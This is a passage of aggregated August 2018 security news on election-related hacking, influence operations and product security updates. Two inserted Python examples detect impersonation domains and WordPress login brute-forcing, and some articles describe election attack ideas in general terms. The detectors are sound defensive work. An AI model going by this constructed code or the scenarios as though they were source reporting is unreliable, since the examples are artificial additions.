FireEye researchers have found several pieces of evidence suggesting that Iran is behind the operation. This includes domains registered with email addresses associated with Iranian organizations, Twitter accounts registered with phone numbers with Iran’s +98 country code, and online personas promoting Iranian holidays.

However, the company says it is only “moderately confident” that Iran is behind the activity, mainly because this is an influence operation, and such operations are by design deceptive.

The cybersecurity firm noted that the Iran-linked threat actor tracked as APT35, NewsBeef, Newscaster and Charming Kitten has also leveraged these types of inauthentic news sites and social media personas in its cyber espionage operations, but there is no evidence that this influence campaign has been conducted by APT35.

“The activity we have uncovered is significant and demonstrates that actors beyond Russia continue to engage in online, social media-driven influence operations as a means of shaping political discourse,” said Lee Foster, Manager of Information Operations Analysis at FireEye. “It also illustrates how the threat posed by such influence operations continues to evolve, and how similar influence tactics can be deployed irrespective of the particular political or ideological goals being pursued.”

FireEye is preparing a report containing technical details on the operation. The report will be shared on request.

Microsoft Disrupts Election-Related Domains Used by Russian Hackers
22.8.2018 securityweek BigBrothers

Microsoft on Monday announced that it took control of several domains associated with a notorious Russia-linked threat actor. The names of the domains suggest the hackers may have been using them in campaigns related to the upcoming midterm elections in the United States.

The tech giant’s Digital Crimes Unit obtained a court order to take control of six domains created by a threat group tracked as APT28, Fancy Bear, Pawn Storm, Strontium, Sednit, Tsar Team and Sofacy.

APT28, which experts believe is sponsored by Russia’s GRU intelligence agency, has been known to launch politics-focused campaigns, including ones aimed at the latest presidential elections in the United States and France. The group may now be targeting the upcoming midterm elections in the U.S.

The domains seized by Microsoft are,,,, and

The first domain appears to mimic the International Republican Institute, a non-profit that receives funding from the U.S. government to promote democracy around the world. The second domain appears to impersonate the Hudson Institute, a politically conservative non-profit think tank. The other domains mimic the website of the U.S. Senate and Microsoft’s Office 365 service.
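
Impersonation domains of this kind (a think tank’s name, “senate”, or an Office 365 brand token wrapped in an unrelated registration) can be screened for automatically from a newly-registered-domain feed. The following is an added example written for this page, not Microsoft code. The table of protected organisations, the legitimate domains assumed for them (hudson.org, iri.org, senate.gov and the Microsoft domains are assumptions used only as reference strings) and the candidate domains are all constructed for illustration; the candidates are not the domains Microsoft seized. The check combines brand-token matching on the registrable label with an edit-similarity test for typosquats.

```python
"""Screen candidate domains for impersonation of protected organisations.
Added example; the brand table and candidates are constructed."""
import difflib
import re

# Assumed protected organisations: their legitimate registrable domains and
# the name tokens an impostor would reuse. Constructed for this example.
PROTECTED = {
    "Hudson Institute": {"domains": ["hudson.org"], "tokens": ["hudson"]},
    "International Republican Institute": {"domains": ["iri.org"], "tokens": ["iri"]},
    "U.S. Senate": {"domains": ["senate.gov"], "tokens": ["senate"]},
    "Microsoft Office 365": {"domains": ["office365.com", "office.com", "onedrive.com"],
                             "tokens": ["office365", "onedrive", "sharepoint"]},
}
TYPOSQUAT_RATIO = 0.8

# Constructed candidates, as they might arrive from a new-domain feed. These
# are not the domains Microsoft seized.
CANDIDATES = [
    "hudson.org", "login.senate.gov", "github.com", "miriam-shop.com",
    "hudson-institute-login.com", "iri-events.net", "senate-login.email",
    "office365-update.com", "hudsom.org",
]


def registrable_name(domain):
    """Label left of the suffix. Naive (drops one label); a production version
    would consult the Public Suffix List for co.uk-style suffixes."""
    labels = domain.lower().strip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def classify(domain):
    """Return (organisation, reason) when the domain looks like an impostor,
    or None when it is the organisation's own domain or unrelated."""
    d = domain.lower().strip(".")
    for info in PROTECTED.values():
        if any(d == legit or d.endswith("." + legit) for legit in info["domains"]):
            return None
    name = registrable_name(d)
    segments = [s for s in re.split(r"[-_]+", name) if s]
    for org, info in PROTECTED.items():
        for tok in info["tokens"]:
            # Short tokens must stand alone (iri-events, not miriam); longer
            # ones may be glued to other words (myoffice365login).
            if tok in segments or (len(tok) >= 6 and tok in "".join(segments)):
                return org, f"contains brand token '{tok}'"
        for legit in info["domains"]:
            legit_name = registrable_name(legit)
            ratio = difflib.SequenceMatcher(None, name, legit_name).ratio()
            if name != legit_name and ratio >= TYPOSQUAT_RATIO:
                return org, f"typosquat of {legit} (similarity {ratio:.2f})"
    return None


def screen(domains):
    """Map each flagged domain to its (organisation, reason)."""
    flagged = {}
    for d in domains:
        verdict = classify(d)
        if verdict is not None:
            flagged[d] = verdict
    return flagged
```

On the constructed feed the screen flags the five impostors (four by brand token, hudsom.org as a typosquat of hudson.org) and leaves the organisations’ own domains, a subdomain of senate.gov, and the unrelated miriam-shop.com alone; the minimum-length rule for glued tokens is what keeps a three-letter acronym such as “iri” from matching inside ordinary words.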

While the domains may have been set up for election-related campaigns, Microsoft says it currently has no evidence that any of them were successfully used in attacks, and it’s unclear exactly who the hackers intended on targeting using these domains.

The company revealed last month that it had spotted some Microsoft phishing domains that had apparently been set up as part of attacks aimed at the campaigns of three congressional candidates who are running in the upcoming midterm elections.

“Microsoft has notified both nonprofit organizations. Both have responded quickly, and Microsoft will continue to work closely with them and other targeted organizations on countering cybersecurity threats to their systems. We’ve also been monitoring and addressing domain activity with Senate IT staff the past several months, following prior attacks we detected on the staffs of two current senators,” Brad Smith, Microsoft’s president and chief legal officer, said in a blog post.

This is not the first time Microsoft has seized domains used by APT28. The company says it has used court orders a total of 12 times over the past two years to shut down 84 fake websites linked to the threat group.

Sean Sullivan, Security Advisor at F-Secure, cautioned that the domains targeted by Microsoft may not necessarily be related to elections.

“Microsoft’s announcement is generating a lot of attention and the focus is overwhelmingly centered on the 2018 mid-term elections. But it’s important not to lose sight of the bigger issue,” Sullivan told SecurityWeek. “The focus on think tanks holding pro-sanction views on Russia’s current regime is about espionage. In short: spies are going to spy. That’s true whether or not it’s an election year. There seems to be a rush to conclude that these six domains are part of an “attack” on the elections that risks missing the complete threat model – and therefore the complete countermeasures that should be taken.”

Microsoft took this opportunity to announce its new AccountGuard initiative, which provides free cybersecurity protection to candidates, campaigns and political institutions using Office 365.

The AccountGuard service, which is part of Microsoft’s Defending Democracy Program, involves notifications about threats, security guidance and education, and the opportunity to test preview releases of new security features.

AccountGuard is currently available only in the United States, but Microsoft plans on offering it in other countries as well in the coming months.

Hacking Elections: Georgia's Midterm Electronic Voting in the Dock
22.8.2018 securityweek BigBrothers

The security of electronic voting and the direct-recording election (DRE) voting machines used has been questioned for years. The upcoming U.S. midterm elections in November, coupled with the attempted Russian meddling in the 2016 presidential election, have made this a current and major concern for many in the security industry and beyond. Now it has gone to court.

Earlier this month (Aug. 3), the Coalition for Good Governance filed a Motion for Preliminary Injunction against the Secretary of State for Georgia (Brian Kemp, who is also the Republican candidate for governor in the midterms) seeking to force the state to abandon DREs and revert to a paper ballot.

The Secretary of State has responded to the Motion, claiming, “Such recklessness, if given the power of a federal decree, would compromise the public interest.”

Security concerns

Concern over the security of electronic voting was heightened following the 2016 presidential election. The incumbent Obama administration accused Russia of interfering and being behind a breach of the DNC and subsequent leak of sensitive data.

For the most part it is believed that Russia attempted to influence rather than control the vote. However, an NSA document acquired and discussed by The Intercept in June 2017 “raises the possibility that Russian hacking may have breached at least some elements of the voting system, with disconcertingly uncertain results.”

There is no claim that Russia affected the outcome of the election. The primary concern is that nobody knows the extent of what was done, nor what could have been done – and, more disconcertingly, what might be done next time.

The vulnerability of the DRE systems themselves is hardly doubted. At the end of 2016, both Cylance and Symantec separately demonstrated hacks against DREs. This month DEF CON ran its second annual Vote Hacking Village, where attendees were invited to hack the voting infrastructure, including DREs – and numerous vulnerabilities were found and exploited.

DRE manufacturers, and officials using them, are quick to point out most exploits require physical access to the machines, and that any individual hack would only affect the votes made on that system. The overall vote itself will remain statistically valid.

Last week (Aug. 13), a new survey from Venafi found that 93% of more than 400 IT security professionals from the U.S., UK and Australia “are concerned about cyber-attacks targeting election infrastructure and data.” Furthermore, “81% believe cyber criminals will target election data as it is transmitted between machines, software and hardware applications, and moved from local polling stations to central aggregation points.”

The voting infrastructure is much wider than vulnerable DREs alone.

Court case in Georgia

The Coalition for Good Governance is attempting to gain a court order to force Georgia to abandon electronic voting and go back to a paper-based ballot because it does not believe a full and fair vote can be guaranteed. It has asked for a Preliminary Injunction.

Georgia stands out from the majority of states. Although not one of the perennial swing votes, these midterms are likely to be different, and a relatively few votes could swing the result one way or the other.

Georgia uses approximately 27,000 Diebold AccuVote DRE touchscreen voting units running a modified version of Windows CE. It does not and cannot produce a paper audit trail of votes. Georgia is one of just a few states – and the largest – that does not produce a paper backup.

The Coalition’s argument hinges on three elements: that DREs are inherently insecure; that Georgia’s voting system has already been breached; and that Georgia voting officials destroyed all evidence of who might have benefited from the breach.

The breach was discovered by security researcher Logan Lamb. The court document states, “In late August 2016, cybersecurity researcher Logan Lamb accessed files hosted on the server on the public internet, including the voter histories and personal information of all Georgia voters, tabulation and memory card programming databases for past and future elections, instructions and passwords for voting equipment administration, and executable programs controlling essential election resources.”

This database, hosted on a Kennesaw State University (KSU) server and including registration details for 6.7 million Georgia voters, was unprotected and could be accessed by anybody with an internet connection.

Richard DeMillo, director of Georgia Tech's Center for 21st Century Universities, told SecurityWeek, “If I were a hacker trying to affect an election in this state, that's where I would start. Because once you have access to those databases, you can, for example, on election day send people to the wrong polling stations. I actually think that this is a line of attack that people haven't looked at which has to do with simply changing contact information for voters.”

DeMillo is a professor at Georgia Tech, has worked in cybersecurity for more than 40 years, and, he says, is “a longtime observer of election security in the state of Georgia.” He is not an official advisor to the Coalition, but as an employee of a public university is available to offer advice to anyone who seeks it.

The concern for the Coalition is that firstly, Georgia did little to secure the database – it remained online and available to everyone for at least six months before it was removed; secondly, that Georgia did not undertake a forensic examination to determine whether the database had been altered or manipulated; and thirdly, three days after the Coalition’s lawsuit was filed, election officials “destroyed all data on the hard drives of the KSU server.”

There is consequently now no way of knowing who may have accessed that database nor whether any unauthorized changes were made to it.

Marilyn R. Marks, VP and executive director of the Coalition for Good Governance, described another potential attack against the Georgia midterms that would be relatively easy if the pollbooks stored at KSU had been downloaded or amended by attackers.

“One of [DeMillo’s] colleagues went to vote, and he was issued the wrong ballot (his affidavit is in the Exhibits of the Motion),” Marks told SecurityWeek. “Name is Kadel. He was given the wrong electronic ballot. If you look at his voter registration record, name address, everything's just fine. We do not know what happened.” His ballot paper seemed to be in order, but was for Congressional District 5 instead of Congressional District 6. Had he not noticed this discrepancy his vote would have been nullified.

“But here's another theoretical attack,” continued Marks. “You can leave all that stuff there. But change the ballot combination code that's in the electronic pollbook and the voter gets issued the wrong ballot. Nobody knows what their ballot combination is. It's not given out to voters.”

Rob Kadel is assistant director for research in education innovation, Center for 21st Century Universities at Georgia Tech.

The Secretary of State’s response to the Coalition’s motion is to concentrate on the physical problems of changing to paper at this stage. The response does not attempt to prove that DRE machines are secure, but states that the Coalition has not proven them to be insecure. It describes the motion as ‘Plaintiff’s paranoia’, and says, “Luddite prejudices against software technology are insufficient justification to override a statutory regime promulgated by duly-elected legislators, sustained against prior constitutional challenges, and overseen by state officials acting pursuant to their respective duties within that legislative framework.”

Both sides vehemently disagree. The Coalition was set to file its own reply to Kemp’s response on Monday (SecurityWeek will post the URLs to this and to Secretary Kemp’s initial response as soon as they become available). The reply is likely to assert that a switch to paper is feasible within the time constraints.

Industry views on the midterms in Georgia

The outcome of the Motion for Preliminary Injunction will be decided by the court, and probably very quickly. In the meantime, SecurityWeek talked to several security experts for their view on the current situation.

“The key to any voting system is the integrity of the data, and given the proven attacks against the DRE systems, this can no longer be guaranteed,” commented Joseph Kucic, CSO at Cavirin. “Without evidence of having the appropriate controls there is a good chance that the plaintiffs could win their case. With regard to the actual motion, any difficulties with paper ballot deployment – and there should not be many – are more than made up for by the potential risks of a compromised system.”

Not everyone agrees. Sanjay Kalra, co-founder and chief product officer at Lacework, told SecurityWeek, “Moving backwards to paper-based systems is not only inefficient, it’s also not materially any more secure. Hackers want to disrupt and steal, which they will do aggressively, irrespective of medium or platform. For those running digital election systems, the vision should be to use a best practices approach along with tools that support awareness and remediation to provide the best protection against bad actors. Those responsible for data protection must always seek to balance efficiency, user experience and security.”

“There’s a compelling case to be made on both sides,” says Abhishek Iyer, technical marketing manager at Demisto. Reverting to paper is supported by the general lack of confidence in the security of DREs and the known voter data leaks. “However,” he adds, “with impending midterm elections, there’s not enough time to execute an end-to-end change and go back to paper-based voting; improper transition could result in voter confusion, error, and inadvertent suppression (since electronic systems are also used to verify voter registration).”

Marilyn Marks disagrees. “There’s no new voting system needed, and no new equipment,” she told SecurityWeek. “They already use paper ballots (for example, for postal votes). They just need to dispense with the touchscreen machines, put paper votes into ballot boxes to be transported to the election office and use the scanners they already have to scan the votes in quantity. All that is needed is more of the same paper ballots – and the printers still have many weeks to do that.”

Ryan Jones, managing principal at Coalfire Labs, didn’t want to comment on any legal aspects between the Coalition for Good Governance and the secretary of state for Georgia. But he did say, “We have assessed not only voting machines, but also the Voluntary Voting System Guidelines standard – by which most voting machines are gauged – as well as the end-to-end gaps in pre-election, election, and post-election processes. We can say with some assurance,” he confirmed, “that machines in their current state, despite having met the VVSG standard, have many technical aspects that can be compromised by a diligent hacker that looks at the hacking challenge across the entire system and process. We have compromised multiple voting systems in a lab setting in as little as two minutes; and as news reports attest, an 11-year-old also recently hacked a voting environment at a security conference.” [DEF CON’s Vote Hacking Village.]

Last word goes to Professor Rich DeMillo. “Georgia is the largest state that does not use auditable elections equipment; so, if I were in the attackers' shoes and was looking for a return on investment, this is the kind of state that I would look at -- a state where the races are likely to be tight and where the chance of me being discovered is going to be slim because by design it is impossible to verify after the election that there was a breach.”

It is now up to the court to decide whether well-documented flaws in the existing electronic voting infrastructure combined with the lack of any auditing capability are sufficiently serious to force a last-minute switch back to paper-based voting in the Georgia state midterm elections in November.

Google Warns Thousands Each Month of State-Sponsored Attacks
22.8.2018 securityweek Attack

Each month, Google sends thousands of warnings to users who might have been targeted in government-backed attacks, even if the attempts have been blocked.

Highly targeted and more sophisticated when compared to typical phishing attempts, which are mainly focused on financial fraud, these state-sponsored attacks come from dozens of countries worldwide, Google says.

Only an extremely small fraction of Google’s users have received such an alert, and an alert doesn’t necessarily mean that the account has been compromised, but the search giant urges everyone who receives the notification to take immediate action.

“We hope you never receive this type of warning, but if you do, please take action right away to enhance the security of your accounts,” Google says.

Users are also provided with guidance on how to improve the security of their accounts, but they can choose to dismiss the warning.

The Internet company has been issuing such alerts since 2012, and recently also brought the warnings to G Suite. Thus, administrators receive an alert when the company detects a possible government-backed phishing attempt targeting a user in the admin’s corporate network.

The warnings themselves have evolved over time from simple text messages displayed at the top of recipient’s Gmail page to more prominent banners.

Such warnings don’t arrive immediately after a phishing attempt is detected; they are sent periodically, so that attackers can’t use the timing of a warning to work out how Google detects their attacks.

“We intentionally send these notices in batches to all users who may be at risk, rather than at the moment we detect the threat itself, so that attackers cannot track some of our defense strategies. We have an expert team in our Threat Analysis Group, and we use a variety of technologies to detect these attempts,” Google reveals.

In addition to alerting the user, the company informs law enforcement of the detected attempts, so they can investigate the incidents on their own.

To improve the security of their accounts, all users are advised to enable two-step verification on their Google account. Those who believe they might be targeted by government-backed phishing should also consider enrolling in the Advanced Protection Program, Google underlines.

Microsoft Rolls Out End-to-End Encryption in Skype
22.8.2018 securityweek

Skype users on the latest version of the messaging application can now take full advantage of end-to-end encryption in their conversations, Microsoft says.

Rolled out under the name of Private Conversations, the feature was initially introduced for a few Skype users in January this year as a preview, and is now available in the latest version of Skype on Windows, Mac, Linux, iOS and Android (6.0+). It started arriving on desktops a couple of weeks ago.

Private Conversations, which takes advantage of the industry standard Signal Protocol by Open Whisper Systems, secures text chat messages and audio calls, along with any files the conversation partners share over Skype (including photo, audio, and video files).

Skype has long used TLS (Transport Layer Security) and AES (Advanced Encryption Standard) to encrypt messages in transit, but the addition of end-to-end encryption adds an extra layer of privacy.

Now, not only is the channel secured, but the messages themselves remain encrypted while they sit on Microsoft’s servers, meaning that they are accessible only to the participants in the conversation.

Private Conversations, however, can only be accessed on one device at a time, the software giant reveals.

To take advantage of the feature, users simply need to tap or click on New Chat and then select Private Conversation. Next, they need to select the contacts they want to start the private conversation with, and these will receive a notification asking them to accept the invitation.

Once a contact accepts the invitation, the private conversation is available on the devices the invitation was sent from/accepted on.

One can also start a private conversation with a contact they are already chatting with.

Users can also delete private conversations, meaning that all of the content will be erased from the device. They can then pick up the conversation again, without having to send a new invitation.

FBI Probes Computer Hacks in California House Campaigns
22.8.2018 securityweek BigBrothers

HUNTINGTON BEACH, Calif. (AP) — The FBI launched investigations after two Southern California Democratic U.S. House candidates were targeted by computer hackers, though it's unclear whether politics had anything to do with the attacks.

A law enforcement official told The Associated Press the FBI looked into hacks involving David Min in the 45th Congressional District and Hans Keirstead in the adjacent 48th District. Both districts are in Orange County and are seen as potential pickups as the Democratic Party seeks to win control of the Congress in November.

A person with knowledge of the Min investigation told the AP on Monday that two laptops used by senior staffers for the candidate were found infected with malware in March. It's not clear what, if any, data was stolen, and there is no evidence the breach influenced the contest.

The CEO of a biomedical research company, Keirstead last summer was the victim of a broad "spear-phishing" attack, in which emails that appear to come from a friend or familiar source are designed to help hackers snatch sensitive or confidential information, the law enforcement official said. There is no evidence Keirstead lost valuable information.

The investigations so far have not turned up evidence the two candidates in Orange County were political targets.

The official and the knowledgeable person were not authorized to discuss the cases publicly and spoke only on condition of anonymity.

Keirstead was narrowly defeated in the June primary for the seat held by Republican Rep. Dana Rohrabacher. Min came in third in the contest to unseat Republican Rep. Mimi Walters.

Min's staff was alerted to a potential cyberattack by a facility manager in the software incubator where his campaign rented space. It was later found the computers were infected with software that records and sends keystrokes, with additional software that concealed it from conventional anti-virus tools used by the campaign.

Hackers also used a broad spear-phishing attack in an attempt to gain access, and FBI investigators are still piecing together additional details, the official said.

The two laptops were replaced, and Min's computer was not infected. The attack on the computers was first reported by Reuters.

Keirstead campaign officials detected repeated attempts to access the campaign's website.

Rolling Stone magazine, which first reported that cyberattack, said hackers or bots tried different username-password combinations in a rapid-fire sequence over a two-and-a-half-month period to get inside the campaign's WordPress-hosted website.

According to the campaign, there were also more than 130,000 so-called brute force attempts over a monthlong period to gain access to the campaign's server through the cloud-server company that hosted the Keirstead campaign's website, Rolling Stone said.

Computer security experts say that a large number of attempts to gain access to a site hosted with the popular and free WordPress software is not unusual.

"Every WordPress hosted website sees 130,000 brute force attempts over a monthlong period, regardless whether it's Bohemian basket weaving, a blog about furry costume construction, or a politician website," said Robert Graham, a cybersecurity expert who created the BlackICE personal firewall.

"Hackers don't know or care who you are: they only care that you use WordPress," Graham said in a text message.
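The credential-guessing described above leaves a characteristic trail in ordinary web server logs: bursts of POST requests to the login endpoint from one client, each answered with a 200 (WordPress re-renders the form on failure) until a 302 marks a successful guess. The following detector is an added example, not code from the article or from either campaign; it assumes the Apache/nginx “combined” log format and runs over a constructed sample log embedded inline. The threshold, window and the `find_bruteforce`/`parse_line` names are this example’s own choices.

```python
"""Flag WordPress login brute-forcing from web server access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache/nginx "combined" log format: client IP, timestamp, quoted request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
# Both endpoints accept credentials; bots favour xmlrpc.php because one request can
# carry many guesses via system.multicall.
LOGIN_PATHS = ("/wp-login.php", "/xmlrpc.php")


def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],  # drop the query string
        "status": int(m.group("status")),
    }


def find_bruteforce(lines, threshold=10, window=timedelta(minutes=5)):
    """Return {ip: {"attempts": n, "success": bool}} for every client that POSTed to a
    login endpoint at least `threshold` times inside some `window`-long interval.
    A failed wp-login.php POST re-renders the form with 200; a 302 in the same run
    is the sign that one of the guesses worked and needs an incident response."""
    posts = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"] in LOGIN_PATHS:
            posts[rec["ip"]].append((rec["ts"], rec["status"]))
    flagged = {}
    for ip, events in posts.items():
        events.sort()
        start = 0
        for end in range(len(events)):  # sliding window over sorted timestamps
            while events[end][0] - events[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged[ip] = {
                    "attempts": len(events),
                    "success": any(status == 302 for _, status in events),
                }
                break
    return flagged


def _line(ip, ts, method, path, status):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "Mozilla/5.0"'


# Constructed sample log: one legitimate login, then a 12-guess burst from a single
# client that ends in a redirect (i.e. a guess succeeded).
SAMPLE_LOG = [
    _line("198.51.100.5", "10/Aug/2018:13:00:00 +0000", "GET", "/", 200),
    _line("198.51.100.5", "10/Aug/2018:13:00:30 +0000", "POST", "/wp-login.php", 302),
] + [
    _line("203.0.113.7", f"10/Aug/2018:13:05:{i:02d} +0000", "POST", "/wp-login.php?action=login", 200)
    for i in range(0, 24, 2)
] + [
    _line("203.0.113.7", "10/Aug/2018:13:05:25 +0000", "POST", "/wp-login.php", 302),
]

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE_LOG).items():
        print(f"{ip}: {info['attempts']} login POSTs, success={info['success']}")
```

On a real site the same logic runs over the daily log file; the interesting signal is not the flagged IP (as Graham notes, every WordPress host sees these) but the `success` flag, which turns background noise into a compromised account.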

Min finished third behind fellow Democrat Katie Porter, who faces Walters in November. In the 48th District, Rohrabacher will face Democrat Harley Rouda, who snagged the second runoff spot by defeating Keirstead by 125 votes.

Russian Hackers Went After Conservative US Groups: Microsoft
22.8.2018 securityweek BigBrothers

The Russian hacking unit that tried to interfere in the US presidential election has been targeting conservative US think tanks, Microsoft said.

Acting on a court order, the company last week seized control of six fake websites used in such efforts, including one that mimicked the US Senate, Microsoft president Brad Smith said in a blog post Monday.

The hackers were linked to the Russian military intelligence agency known as the GRU, Smith wrote.

The idea was to have targets believe they were following links to sites run by these US political groups, while actually landing on look-alike sites run by the hackers, where passwords and other information could be stolen.

Smith said one such site appeared to mimic that of the International Republican Institute, which promotes democratic principles and whose board includes Republican senators, among them John McCain, who have been critical of President Vladimir Putin.

Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity.

"We're concerned that these and other attempts pose security threats to a broadening array of groups connected with both American political parties in the run-up to the 2018 elections," Smith wrote.

Experts said the aim was to go after anyone who opposes Putin.

"This is another demonstration of the fact that the Russians aren't really pursuing partisan attacks. They are pursuing attacks that they perceive in their own national self-interest," Eric Rosenbach, the director of the Defending Digital Democracy project at Harvard University, told the New York Times.

"It's about disrupting and diminishing any group that challenges how Putin's Russia is operating at home and around the world," Rosenbach added.

The Kremlin dismissed the fresh allegations, with spokesman Dmitry Peskov saying he did not know "which hackers are being talked about, what influencing of elections".

"We do not understand what Russian military intelligence has to do with this. What is the basis of such serious accusations? They should not be raised without some foundation," he told journalists.

Code Analysis Firm Semmle Launches With $21 Million in Funding
22.8.2018 securityweek IT

Semmle, a company whose software engineering analytics platform is already used by several major companies, on Tuesday announced its global launch, along with a $21 million Series B funding round.

This funding round, led by Accel Partners with participation from Work-Bench, brings the total raised by the company to date to $31 million. The newly acquired funds will be used to accelerate Semmle’s go-to-market efforts serving large tech and financial services companies worldwide.

Semmle offers two products designed to help organizations find coding errors that can introduce critical vulnerabilities. One of the products, QL, is a software analytics engine that treats code as data so that it can be quickly and accurately analyzed by developers and security response teams.

“The same kinds of logical coding mistakes are made over and over again, sometimes repeatedly within a single project, and sometimes across the whole software ecosystem. These mistakes are the source of many of today’s critical software vulnerabilities,” Semmle explained on its website. “Using QL, you can codify such mistakes as queries, find logical variants of the same mistake elsewhere in the code, and prevent similar mistakes from being introduced in the future by automatically catching them before code gets merged.”

QL powers Semmle’s second product, LGTM, whose name stems from “Looks Good to Me,” which programmers use to express approval when reviewing software.

LGTM is a software engineering analytics platform that combines deep semantic code search and data science insights from a community of hundreds of thousands of developers. The platform, which Semmle claims is easy to integrate into the developer workflow, provides feedback, coding recommendations, and benchmarking insights.

Semmle’s platform has already been used in recent years by Microsoft, Google, Capital One, Credit Suisse, Nasdaq and NASA, which has helped the company perfect its product, said Oege de Moor, CEO and co-founder of Semmle.

The commercial product is now being made available to the rest of the world.

“On August 21, for the first time, any company can have access to our enterprise product and benefit from the work of leading technology companies like Google and Microsoft. Every customer benefits from the work that these security researchers report back to our vulnerability analysis repository — we are pioneering security as a public good,” de Moor told SecurityWeek.

“The LGTM community is our security research team, and this is one of the most powerful aspects of our platform. The leading companies using our tools have now made insights available to the rest of our customers, who might not have the resources or scale to invest in product security teams to hunt for vulnerabilities,” he added.

Semmle is the company that last year reported CVE-2017-9805, an Apache Struts vulnerability that ended up being exploited in the wild.

CrowdStrike Adds Malware Search Engine to 'Hybrid Analysis'
22.8.2018 securityweek

Endpoint security firm CrowdStrike on Tuesday announced that new search capabilities have been added to the company’s Hybrid Analysis service.

Hybrid Analysis is a free malware analysis service owned by CrowdStrike since November 2017, when it acquired Payload Security, the firm that originally developed the automated malware analysis sandbox technology.

Hybrid Analysis leverages CrowdStrike’s Falcon Sandbox, a malware analysis framework that the company claims has been used worldwide by many security operations centers, CERTs, cyber forensics labs, researchers and threat intelligence services.

As of August 21, Hybrid Analysis also includes malware search features powered by CrowdStrike’s Falcon MalQuery, a proprietary cloud-based malware research tool that allows industry professionals to quickly and efficiently search a massive collection of samples.

The addition of Falcon MalQuery to Hybrid Analysis allows users to quickly scan through petabytes of threat data based on YARA rules or string/binary patterns. Each search can be refined based on certain criteria, such as the type, date and size of the file.


According to the security firm, running a scan takes only minutes instead of hours, and search results can be downloaded and shared.

CrowdStrike has described the addition of Falcon MalQuery to Hybrid Analysis as donating the tool to the community.

The company has published a blog post that briefly explains how the new search capabilities work.

Adobe Patches Critical Code Execution Flaws in Photoshop
22.8.2018 securityweek

Adobe late on Tuesday released updates for the Windows and macOS versions of Photoshop CC to address two critical remote code execution vulnerabilities.

The flaws impact Photoshop CC 2018 version 19.1.5 and earlier 19.x versions, and Photoshop CC 2017 18.1.5 and earlier 18.x versions. The issues have been addressed with the release of versions 19.1.6 and 18.1.6.

The security holes, reported by Kushal Arvind Shah of Fortinet's FortiGuard Labs, have been described by Adobe as memory corruption bugs that can be exploited by a remote attacker to execute arbitrary code in the context of the targeted user.

The vulnerabilities are tracked as CVE-2018-12810 and CVE-2018-12811.

While the flaws have been assigned a “critical” severity rating, their priority rating is “3,” which indicates that the affected product has historically not been targeted by malicious actors. In this case, users are advised by Adobe to install the updates “at their discretion.”

Earlier this month, Adobe addressed nearly a dozen vulnerabilities in Flash Player, the Creative Cloud Desktop Application, Experience Manager, and Acrobat and Reader with the company’s Patch Tuesday updates for August 2018. None of the flaws have been exploited in the wild.

It’s unclear why the Photoshop CC updates were not included in the Patch Tuesday updates.

Last month, researchers claimed they had found a potentially serious security issue in Adobe’s internal systems, but the company downplayed the impact of the vulnerability saying it was only an XSS flaw.

Facebook Stops Misinformation Campaigns Tied to Iran, Russia
22.8.2018 securityweek

Facebook said Tuesday it stopped stealth misinformation campaigns from Iran and Russia, shutting down accounts as part of its battle against fake news ahead of elections in the United States and elsewhere.

Facebook removed more than 650 pages, groups and accounts identified as "networks of accounts misleading people about what they were doing," according to chief executive Mark Zuckerberg.

While the investigation was ongoing, and US law enforcement notified, content from some of the pages was traced back to Iran, while other pages were linked to groups previously tied to Russian intelligence operations, the social network said.

"We believe they were parts of two sets of campaigns," Zuckerberg said.

The accounts, some of them on Facebook-owned Instagram, were presented as being independent news or civil society groups but were actually working in coordinated efforts, social network firm executives said in a briefing with reporters.

Content posted by accounts targeted Facebook users in Britain, Latin America, the Middle East and the US, according to head of cybersecurity policy Nathaniel Gleicher.

He said that posts by the involved accounts were still being scrutinized and their goals were unclear at this point.

The Facebook investigation was prompted by a tip from cybersecurity firm FireEye regarding a collection of "Liberty Front Press" pages at the social network and other online services.

Facebook linked the pages to Iranian state media through publicly available website registration information, computer addresses and information about account administrators, according to Gleicher.

Among the accounts was one from "Quest 4 Truth" claiming to be an independent Iranian media organization. It was linked to Press TV, an English-language news network affiliated with Iranian state media, Gleicher said.

The first "Liberty Front Press" accounts found on Facebook were created in 2013 and posted primarily political content focused on the Middle East, Britain, Latin America and the US.

- Russian military tie -

Facebook also removed a set of pages and accounts linked to sources the US government previously identified as Russian military services, according to Gleicher.

"While these are some of the same bad actors we removed for cybersecurity attacks before the 2016 US election, this more recent activity focused on politics in Syria and Ukraine," Gleicher said.

The accounts were associated with Inside Syria Media Center, which the Atlantic Council and other organizations have identified as covertly spreading pro-Russian and pro-Assad content.

US Senator Richard Burr, a Republican who chairs the select committee on intelligence, said that the halted campaigns further prove that "the goal of these foreign social media campaigns is to sow discord" and "that Russia is not the only hostile foreign actor developing this capability."

Facebook chief operating officer Sheryl Sandberg is among Silicon Valley executives set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.

"We get that 2018 is a very important election year, not just in the US," Zuckerberg responded when asked about the upcoming hearing.

"So this is really serious. This is a top priority for the company."

In July, Facebook shut down more than 30 fake pages and accounts involved in what appeared to be a "coordinated" attempt to sway public opinion on political issues ahead of November midterm elections, but did not identify the source.

It said the "bad actor" accounts on the world's biggest social network and its photo-sharing site Instagram could not be tied to Russia, which used the platform to spread disinformation ahead of the 2016 US presidential election.

Badge Reading App Exposed Details of Black Hat Conference Attendees
21.8.2018 securityweek Congress

A researcher discovered that a vulnerability in the badge reading app used at the recent Black Hat security conference exposed the registration details of all attendees.

The badges provided to people attending Black Hat and other conferences contain an NFC tag. When vendors scan the tag, they obtain the information provided during the registration process by the individual wearing the badge.

